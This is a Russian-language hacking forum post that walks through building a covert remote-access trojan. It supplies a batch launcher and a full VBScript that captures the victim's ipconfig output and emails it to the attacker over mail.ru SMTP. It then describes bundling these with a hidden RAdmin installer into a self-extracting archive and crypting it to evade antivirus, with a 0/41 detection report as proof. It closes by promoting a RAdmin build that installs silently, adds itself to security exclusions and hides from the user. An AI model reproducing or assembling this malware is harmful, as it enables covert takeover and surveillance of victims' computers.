В этой теме я покажу как замутить скрыто установочный RADMIN с отправкой IP на мыло. Заходим в блокнот и пишем , название можно дать любое но расширение нет .
Я дал название lamer.bat . Для открывания файлов.
@Echo off
C:\radmin.exe
C:\mail.vbs
Теперь создадим vbs скрипт для отправки на мыло , но здесь уже название дадим mail.vbs
Set WshShell = CreateObject("WScript.Shell") WshShell.Run "cmd.exe /c ipconfig > C:\ip.txt", 0, false WScript.Sleep (5000) Set S = CreateObject("Wscript.Shell") set FSO=createobject("scripting.filesystemobject") Call SendPost("smtp.mail.ru","мыло куда придёт отчёт@mail.ru","левое мыло@mail.ru","IP ЛАМЕРА","hacked by hack-win32") Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody) Set iMsg=CreateObject("CDO.Message") Set iConf=CreateObject("CDO.Configuration") Set Flds=iConf.Fields Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2 Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1 Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="логин без @mail.ru" Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="пароль от левого мыла" Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru" Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25 Flds.Update iMsg.Configuration=iConf iMsg.To=strTo iMsg.From=strFrom iMsg.Subject=strSubject iMsg.TextBody=strBody iMsg.AddAttachment "C:\ip.txt" iMsg.Send End Function Set iMsg=Nothing Set iConf=Nothing Set Flds=Nothing
Теперь скачиваем скрыто установочный RADMIN
Ну и всё остался последний и самый сложный этап , нужно всё правельно Склепить .
Выделяем все 3 файла и правой кнопкой мыши нажимаем , выбираем "Добавить в архив"
Далее нажимаем "Дополнительно" --> "Параметры SFX"
http://i024.radikal.ru/0910/00/21fca36a3d50.jpg
Всё сохраняем . Криптуем файл .
Вот ссылку на один из лучших крипторов Poison Yvi Crypter
Отчёт после криптации
Результат: 0/41 (0%) a-squared 4.5.0.41 2009.10.15 - AhnLab-V3 5.0.0.2 2009.10.15 - AntiVir 7.9.1.35 2009.10.15 - Antiy-AVL 2.0.3.7 2009.10.15 - Authentium 5.1.2.4 2009.10.15 - Avast 4.8.1351.0 2009.10.14 - AVG 8.5.0.420 2009.10.15 - BitDefender 7.2 2009.10.15 - CAT-QuickHeal 10.00 2009.10.15 - ClamAV 0.94.1 2009.10.15 - Comodo 2609 2009.10.15 - DrWeb 5.0.0.12182 2009.10.15 - eSafe 7.0.17.0 2009.10.15 - eTrust-Vet 35.1.7069 2009.10.15 - F-Prot 4.5.1.85 2009.10.15 - F-Secure 8.0.14470.0 2009.10.15 - Fortinet 3.120.0.0 2009.10.15 - GData 19 2009.10.15 - Ikarus T3.1.1.72.0 2009.10.15 - Jiangmin 11.0.800 2009.10.15 - K7AntiVirus 7.10.871 2009.10.15 - Kaspersky 7.0.0.125 2009.10.15 - McAfee 5771 2009.10.14 - McAfee+Artemis 5771 2009.10.14 - McAfee-GW-Edition 6.8.5 2009.10.15 - Microsoft 1.5101 2009.10.15 - NOD32 4511 2009.10.15 - Norman 6.03.02 2009.10.15 - nProtect 2009.1.8.0 2009.10.15 - Panda 10.0.2.2 2009.10.15 - PCTools 4.4.2.0 2009.10.15 - Prevx 3.0 2009.10.15 - Rising 21.51.34.00 2009.10.15 - Sophos 4.46.0 2009.10.15 - Sunbelt 3.2.1858.2 2009.10.15 - Symantec 1.4.4.12 2009.10.15 - TheHacker 6.5.0.2.043 2009.10.15 - TrendMicro 8.950.0.1094 2009.10.15 - VBA32 3.12.10.11 2009.10.15 - ViRobot 2009.10.15.1986 2009.10.15 - VirusBuster 4.6.5.0 2009.10.15 -
Подробней про скрытый RAdmin
Скрытый RAdmin Private Release.
Вашему вниманию представляется уникальная сборка хорошо зарекомендовавшей себя программы удаленного администрирования Remote Administrator(C) - Скрытый RAdmin.
Уникальность заключается в том, что сам инсталлятор устанавливается скрытно от пользователя, прописывается в список исключений в Windows Security Center (и соответственно разрешает список исключений), полностью прописываются настройки программы (скрытие иконки из system tray, активационный ключ, пароль для соединения и т.д.). Если вы хотите хорошую программу для удаленного наблюдения/администрирования, то Скрытый RAdmin - ваш выбор! Т.к. RAdmin не является программой-шпионом или какой-либо троянской программой, то антивирусы не "ругаются" при установке.
Данная сборка представляет собой полностью скрытый инсталятор!
Пароль для соединения: privedmidved
взято от сюда нажимай